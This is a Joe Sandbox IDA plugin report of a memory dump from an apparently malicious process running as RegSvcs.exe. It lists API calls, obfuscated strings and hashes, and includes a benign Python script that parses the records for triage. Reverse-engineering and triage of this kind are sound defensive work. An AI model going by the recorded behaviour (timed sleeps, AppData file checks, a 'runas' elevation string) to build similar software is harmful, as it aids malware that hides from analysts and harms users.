                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                      • String ID: p"B
                                                      • API String ID: 3943753294-2496714718
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0042CE1F
                                                      • type_info::operator==.LIBVCRUNTIME ref: 0042CE41
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0042CF50
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0042D022
                                                      • _UnwindNestedFrames.LIBCMT ref: 0042D0A6
                                                      • CallUnexpected.LIBVCRUNTIME ref: 0042D0C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447E5F), ref: 00446204
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$p"B$pow$sqrt
                                                      • API String ID: 3527080286-2023024955
                                                      APIs
                                                      • _free.LIBCMT ref: 00436CCE
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00436CDA
                                                      • _free.LIBCMT ref: 00436CE5
                                                      • _free.LIBCMT ref: 00436CF0
                                                      • _free.LIBCMT ref: 00436CFB
                                                      • _free.LIBCMT ref: 00436D06
                                                      • _free.LIBCMT ref: 00436D11
                                                      • _free.LIBCMT ref: 00436D1C
                                                      • _free.LIBCMT ref: 00436D27
                                                      • _free.LIBCMT ref: 00436D35
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: 111$246122658369$JiKw4PF0$PBB+$PL==$Xv==$Zyt=
                                                      • API String ID: 3677997916-3628501398
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      APIs
                                                      • __Mtx_unlock.LIBCPMT ref: 00425EF7
                                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00425F49
                                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00425F59
                                                        • Part of subcall function 00403A60: __Mtx_unlock.LIBCPMT ref: 00403B54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                      • String ID: 0EF$$@$$@
                                                      • API String ID: 3298230783-2852628486
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040499F
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: 0*@$0*@$ios_base::badbit set$pI@$pI@$$@
                                                      • API String ID: 3109751735-465750908
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C827
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0042C82F
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C8B8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0042C8E3
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm$p"B
                                                      • API String ID: 1170836740-3916959777
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                      • String ID:
                                                      • API String ID: 3990724213-0
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040499F
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: 0*@$0*@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$$@
                                                      • API String ID: 3109751735-1927355542
                                                      APIs
                                                        • Part of subcall function 0040A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A99F1BC9,00000000,?), ref: 0040A4BA
                                                      • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00467494,0000000E,A99F1BC9,00000000,00000000), ref: 0041AE2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFileFolderPath
                                                      • String ID: .$246122658369$Xv==$ZOt=$ZS7n
                                                      • API String ID: 1512852658-1015348533
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • _free.LIBCMT ref: 00435C5B
                                                      • _free.LIBCMT ref: 00435C74
                                                      • _free.LIBCMT ref: 00435CB2
                                                      • _free.LIBCMT ref: 00435CBB
                                                      • _free.LIBCMT ref: 00435CC7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast
                                                      • String ID: p"B
                                                      • API String ID: 3291180501-2496714718
                                                      • API ID:
                                                      • String ID: list too long
                                                      • API ID:
                                                      • String ID: api-ms-$ext-ms-
                                                      APIs
                                                        • Part of subcall function 00441132: _free.LIBCMT ref: 00441157
                                                      • _free.LIBCMT ref: 00441434
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 0044143F
                                                      • _free.LIBCMT ref: 0044144A
                                                      • _free.LIBCMT ref: 0044149E
                                                      • _free.LIBCMT ref: 004414A9
                                                      • _free.LIBCMT ref: 004414B4
                                                      • _free.LIBCMT ref: 004414BF
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0042DE97,?,?,0042DE5F,00000000,00000000,?), ref: 0042DEB7
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042DECA
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0042DE97,?,?,0042DE5F,00000000,00000000,?), ref: 0042DEED
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll$p"B
                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 004377B7
                                                      • __fassign.LIBCMT ref: 0043799C
                                                      • __fassign.LIBCMT ref: 004379B9
                                                      • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00437A01
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00437A41
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00437AE9
                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                      • String ID:
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0042981F
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0042988A
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004298A7
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004298E6
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00429945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00429968
                                                      • API ID: ByteCharMultiStringWide
                                                      • String ID:
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004247B5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004247D7
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004247F7
                                                      • __Getctype.LIBCPMT ref: 0042488D
                                                      • std::_Facet_Register.LIBCPMT ref: 004248AC
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004248C4
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                      • String ID:
                                                      APIs
                                                      • Sleep.KERNEL32(00000064,A99F1BC9,?,00000000,004490FD,000000FF), ref: 00408A1C
                                                      • __Init_thread_footer.LIBCMT ref: 00408AB6
                                                        • Part of subcall function 00429A98: EnterCriticalSection.KERNEL32(00468FA8,74DF0F00,?,00408ABB,0046CDC0,00450100), ref: 00429AA2
                                                        • Part of subcall function 00429A98: LeaveCriticalSection.KERNEL32(00468FA8,?,00408ABB,0046CDC0,00450100), ref: 00429AD5
                                                        • Part of subcall function 00429A98: WakeAllConditionVariable.KERNEL32(?,0046CDC0,00450100), ref: 00429B4C
                                                      • CreateThread.KERNEL32 ref: 00408B1B
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408B26
                                                        • Part of subcall function 00429AE2: EnterCriticalSection.KERNEL32(00468FA8,00000000,74DF0F00,?,00408A41,0046CDC0), ref: 00429AED
                                                        • Part of subcall function 00429AE2: LeaveCriticalSection.KERNEL32(00468FA8,?,00408A41,0046CDC0), ref: 00429B2A
                                                      • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                                                      • String ID: runas
                                                      APIs
                                                      • GetLastError.KERNEL32(?,0044BDDD,0042C9AB,0042B044,00427D59,A99F1BC9,?,?,?,00000000,0044C997,000000FF,?,00402576,?,?), ref: 0042C9C2
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0042C9D0
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0042C9E9
                                                      • SetLastError.KERNEL32(00000000,?,00000000,0044C997,000000FF,?,00402576,?,?,0000000F,00403BA5,00000000,0000000F,00000000,0044C330,000000FF), ref: 0042CA3B
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004029A6
                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00402A40
                                                      • API ID: ___std_exception_copy___std_exception_destroy
                                                      • String ID: 0*@$$@$$@
                                                      • API ID: AdjustPointer
                                                      • String ID: p"B
                                                      Strings
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 0043F64C
                                                      • API ID:
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      APIs
                                                        • Part of subcall function 00427FC9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0042801B,00000014,?,0042805C,00000014,?,00402D32,00000000,00000014,00000000,A99F1BC9), ref: 00427FD5
                                                      • __Mtx_unlock.LIBCPMT ref: 004280AE
                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,A99F1BC9,?,?,?,004488A0,000000FF), ref: 004280D6
                                                      • __Mtx_unlock.LIBCPMT ref: 00428111
                                                      • __Cnd_broadcast.LIBCPMT ref: 00428122
                                                      • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                      • String ID: p"B
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0042DAC8,?,?,00000000,?,?,0042DB7A,00000002,FlsGetValue,004533D8,004533E0,?), ref: 0042DA97
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      APIs
                                                      • SleepConditionVariableCS.KERNEL32(?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429B8D
                                                      • LeaveCriticalSection.KERNEL32(00468FA8,0046CDC0,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429B97
                                                      • WaitForSingleObjectEx.KERNEL32(0046CDC0,00000000,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429BA8
                                                      • EnterCriticalSection.KERNEL32(00468FA8,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429BAF
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID: p"B
                                                      APIs
                                                        • Part of subcall function 004383E5: HeapAlloc.KERNEL32(00000000,00420D37,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00438417
                                                      • _free.LIBCMT ref: 004355F4
                                                      • _free.LIBCMT ref: 0043560B
                                                      • _free.LIBCMT ref: 00435628
                                                      • _free.LIBCMT ref: 00435643
                                                      • _free.LIBCMT ref: 0043565A
                                                      • API ID: _free$AllocHeap
                                                      • String ID:
                                                      • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                      • String ID:
                                                      • API String ID: 3354401312-0
                                                      • Opcode ID: 43d528b51b35c9bbb2da3ec8c41d4e56f83747dbf66717eb6b125c5ac66ba4c8
                                                      • Instruction ID: 40a91d06e2e52990f7b6d67599c9d5afda9527cab6aa50ef88dbd7d7a38f50f2
                                                      • Opcode Fuzzy Hash: 43d528b51b35c9bbb2da3ec8c41d4e56f83747dbf66717eb6b125c5ac66ba4c8
                                                      • Instruction Fuzzy Hash: 76616E70E01229DFDF10DFA5D944BAEBBB4BF05308F54419EE805A7342DB39AA05CBA5
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0040F547
                                                      • CoCreateInstance.OLE32(0045DFB0,00000000,00000001,0045E010,?), ref: 0040F563
                                                      • CoUninitialize.OLE32 ref: 0040F571
                                                      • CoUninitialize.OLE32 ref: 0040F630
                                                      • CoUninitialize.OLE32 ref: 0040F644
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Uninitialize$CreateInitializeInstance
                                                      • String ID:
                                                      • API String ID: 1968832861-0
                                                      • Opcode ID: c0b01dbfa6797318106262dbd2fed837c9afe2e09affc095f62f3251812b7104
                                                      • Instruction ID: e86ff81544685c45070fe39142173a451fe33c36e56a07e1c3fb2bb4d0f15041
                                                      • Opcode Fuzzy Hash: c0b01dbfa6797318106262dbd2fed837c9afe2e09affc095f62f3251812b7104
                                                      • Instruction Fuzzy Hash: 6A51E471A00208AFDF14DF64DC84B9EBBB5EF48314F108539E805F7691D739A948CBA9
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00424F46
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00424F66
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00424F86
                                                      • std::_Facet_Register.LIBCPMT ref: 00425021
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00425039
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: de826de0b8665dce7b354b76897ab4d89b084adf4cf8c32ccdcbc88c9caf88b8
                                                      • Instruction ID: 634a645fbb89883a8048affa87e368f531f69a44de34e299c7b5b9c255acbea1
                                                      • Opcode Fuzzy Hash: de826de0b8665dce7b354b76897ab4d89b084adf4cf8c32ccdcbc88c9caf88b8
                                                      • Instruction Fuzzy Hash: FA41F371B002249BCB20DF55E980B6EB7B4EF80714F55416FE8066B381DB78AD01CBC9
                                                      APIs
                                                      • _free.LIBCMT ref: 00440ED3
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00440EE5
                                                      • _free.LIBCMT ref: 00440EF7
                                                      • _free.LIBCMT ref: 00440F09
                                                      • _free.LIBCMT ref: 00440F1B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 976f773178b3a1b3aa785fdbb1b20de492f2985a2c0ef50a8997057c72e40866
                                                      • Instruction ID: 60032924811c2865658c18812589d751f3704ea8c5b5f64c4353d60af17ce8ba
                                                      • Opcode Fuzzy Hash: 976f773178b3a1b3aa785fdbb1b20de492f2985a2c0ef50a8997057c72e40866
                                                      • Instruction Fuzzy Hash: DDF04F32514300AB9E35EB65E881C1BB7E9EA54310B691C1EF908E7701DF78FC90869C
                                                      APIs
                                                      • Sleep.KERNEL32(00002710,A99F1BC9,00000000,?), ref: 00419749
                                                        • Part of subcall function 0040A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A99F1BC9,00000000,?), ref: 0040A4BA
                                                      • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00467494,0000000E), ref: 004197C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFileFolderPathSleep
                                                      • String ID: Xv==$ZBmu
                                                      • API String ID: 70540035-658444483
                                                      • Opcode ID: e5849001c9129c7977783ef44150e774fff656bdb8885442c5f0908c86a9f48c
                                                      • Instruction ID: d8424b626564b53d3efe14781ec4d7e2cc7769f2fe4b5d16fb930cc59ee87601
                                                      • Opcode Fuzzy Hash: e5849001c9129c7977783ef44150e774fff656bdb8885442c5f0908c86a9f48c
                                                      • Instruction Fuzzy Hash: 24C1A130D04288DFEF14DFA8C958BDDBFB6AF45308F644199D4046B282D7B95E88CB65
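The entries in this section are the Joe Sandbox IDA plugin's per-function records, and when triaging a dump like this one it helps to turn them into something searchable: which functions call Sleep together with GetFileAttributesA, what the recorded Sleep interval and SHGetFolderPathA CSIDL argument decode to, which import modules dominate. The script below is an added example written for this page, not Joe Sandbox code. It assumes the layout visible above (bullet lines, "Instruction Fuzzy Hash" as the last field of each record, "$" as the separator inside String ID) and carries two entries copied from this report as inline sample input, the second one abbreviated.

```python
"""Parse Joe Sandbox IDA-plugin function records (the "APIs / Memory Dump Source /
Opcode ID / Instruction Fuzzy Hash" blocks above) into searchable dicts. Added example,
not Joe Sandbox code; assumption: "Instruction Fuzzy Hash" is the last field of a record."""
import re
from collections import Counter

# One API line: "[Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: XXXXXXXX"
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<name>[\w:~]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
# CSIDL constants as documented for SHGetFolderPath (subset that matters in triage).
_CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
          0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}

def _parse_source_file(value):
    # "<dump>.sdmp, Offset: 00400000, based on PE: true"
    parts = [p.strip() for p in value.split(",")]
    out = {"dump": parts[0]}
    for p in parts[1:]:
        k, _, v = p.partition(":")
        if k == "Offset":
            out["offset"] = int(v, 16)
        elif k == "based on PE":
            out["based_on_pe"] = v.strip().lower() == "true"
    return out

def parse_report(text):
    """Return one dict per function block, in document order."""
    records, cur = [], {"apis": [], "strings": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue  # "APIs", "Yara matches", ... headers carry no data
        line = line[1:].strip()
        m = _API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m["name"], "module": m["module"], "ref": int(m["ref"], 16),
                "args": m["args"].split(",") if m["args"] is not None else [],
                "subcall_of": int(m["parent"], 16) if m["parent"] else None})
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower().replace(" ", "_"), value.strip()
        if key == "source_file":
            cur.update(_parse_source_file(value))
        elif key == "string_id":  # "$"-separated; a literal "$" in a string is ambiguous
            cur["strings"] = [s for s in value.split("$") if s]
        else:
            cur[key] = value
        if key == "instruction_fuzzy_hash":  # closes the record
            records.append(cur)
            cur = {"apis": [], "strings": []}
    return records

def find_calls(records, *names, include_subcalls=True):
    """Records whose API list contains every name in `names`."""
    hits = []
    for r in records:
        seen = {a["name"] for a in r["apis"] if include_subcalls or a["subcall_of"] is None}
        if all(n in seen for n in names):
            hits.append(r)
    return hits

def module_histogram(records):
    return Counter(a["module"] for r in records for a in r["apis"])

def annotate(record):
    """Decode the recorded arguments of APIs that matter in triage (Sleep, SHGetFolderPathA)."""
    notes = []
    for a in record["apis"]:
        args = a["args"]
        if a["name"] == "Sleep" and args and args[0] != "?":
            notes.append(f"Sleep {int(args[0], 16)} ms at {a['ref']:08X}")
        elif a["name"] == "SHGetFolderPathA" and len(args) > 1 and args[1] != "?":
            csidl = int(args[1], 16)
            notes.append(f"SHGetFolderPathA {_CSIDL.get(csidl, hex(csidl))} at {a['ref']:08X}")
    return notes

# Sample input: two entries copied from the report above (the second abbreviated).
SAMPLE = """\
APIs
• Sleep.KERNEL32(00002710,A99F1BC9,00000000,?), ref: 00419749
  • Part of subcall function 0040A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A99F1BC9,00000000,?), ref: 0040A4BA
• GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00467494,0000000E), ref: 004197C5
• Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: AttributesFileFolderPathSleep
• String ID: Xv==$ZBmu
• Instruction Fuzzy Hash: 24C1A130D04288DFEF14DFA8C958BDDBFB6AF45308F644199D4046B282D7B95E88CB65
APIs
• GetVersionExW.KERNEL32(0000011C,?,A99F1BC9,00000000), ref: 00409A99
• GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409B00
• GetProcAddress.KERNEL32(00000000), ref: 00409B07
• API ID: AddressHandleModuleProcVersion
• String ID:
• Instruction Fuzzy Hash: CA515970E042589BDB14EF68DD457DEB774EB45314F5042BAE804A73C2EB389EC08B99
"""

if __name__ == "__main__":
    for r in find_calls(parse_report(SAMPLE), "Sleep", "GetFileAttributesA"):
        print(r["api_id"], annotate(r))
```

Run against the full report text, `find_calls(records, "Sleep", "GetFileAttributesA")` isolates the entry above, and `annotate` turns its raw arguments into the details worth carrying into a triage note: the Sleep argument 00002710 is 10000 ms, and CSIDL 0x1A passed to SHGetFolderPathA is CSIDL_APPDATA. The `instruction_fuzzy_hash` field kept on every record is the value to pivot on when comparing this dump's functions against other samples; `include_subcalls=False` restricts a search to APIs the function calls directly rather than through a callee.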
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EA4B
                                                        • Part of subcall function 0043E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,004380F7,0000FDE9,8B18EC83,?,?,?,00437E70,0000FDE9,00000000,?), ref: 0043E50B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free
                                                      • String ID: PC$PC
                                                      • API String ID: 3242298965-546519453
                                                      • Opcode ID: 20d774936208bb7ee1843faed3b48977cd8e7a89bce7e7f6d6b8a400a86d1594
                                                      • Instruction ID: 15c659c6739a36d7261b53587305968e72243a2b27e5f2b2920781d657e0185c
                                                      • Opcode Fuzzy Hash: 20d774936208bb7ee1843faed3b48977cd8e7a89bce7e7f6d6b8a400a86d1594
                                                      • Instruction Fuzzy Hash: 89811471A01205ABDF11AFA6DC42ABFB7A9EF18704F54502BF901AB2C1E7399E41C758
                                                      APIs
                                                        • Part of subcall function 00402C20: ___std_exception_copy.LIBVCRUNTIME ref: 00402C53
